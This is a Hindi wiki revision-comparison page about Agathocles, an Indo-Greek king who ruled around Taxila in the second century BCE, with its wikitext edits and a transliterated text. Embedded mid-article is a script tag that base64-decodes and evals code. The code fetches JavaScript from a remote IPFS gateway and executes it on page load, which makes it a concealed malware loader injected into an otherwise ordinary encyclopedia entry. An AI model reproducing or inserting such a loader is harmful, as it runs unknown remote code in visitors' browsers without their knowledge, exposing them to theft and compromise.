Difference between revisions of "अगाथोक्लिस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*अगाथोक्लिस भारत का एक यवन राजा था जो तक्षशिला के ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "सिक़्क़े" to "सिक्के")
 
(8 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*अगाथोक्लिस [[भारत]] का एक यवन राजा था जो [[तक्षशिला]] के क्षेत्र में 190-180 ई. पू. राज्य करता था।  
+
*अगाथोक्लिस [[भारत]] का एक [[यवन]] राजा था जो [[तक्षशिला]] के क्षेत्र में 190-180 ई. पू. राज्य करता था।  
*उस क्षेत्र में उसके कुछ सिक्के भी पाये गये हैं, जिनमें उसका नाम यूनानी और प्राकृत दोनों भाषाओं में अंकित है।<ref>भारतीय इतिहास कोश पृष्ठ संख्या-05</ref>
+
*उस क्षेत्र में उसके कुछ सिक्के भी पाये गये हैं, जिनमें उसका नाम [[यूनानी]] और प्राकृत दोनों भाषाओं में अंकित है।
{{लेख प्रगति
+
{{प्रचार}}
|आधार=आधार1
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|प्रारम्भिक=
+
{{संदर्भ ग्रंथ}}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
*भारतीय इतिहास कोश पृष्ठ संख्या-05
 +
==संबंधित लेख==
 +
{{यवन शासक}}{{प्राचीन विदेशी शासक}}
 +
[[Category:विदेशी आक्रमणकारी]]
 +
[[Category:पूर्व मध्य काल]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:03, 3 March 2013

  • agathoklis bharat ka ek yavan raja tha jo takshashila ke kshetr mean 190-180 ee. poo. rajy karata tha.
  • us kshetr mean usake kuchh sikke bhi paye gaye haian, jinamean usaka nam yoonani aur prakrit donoan bhashaoan mean aankit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • bharatiy itihas kosh prishth sankhya-05

sanbandhit lekh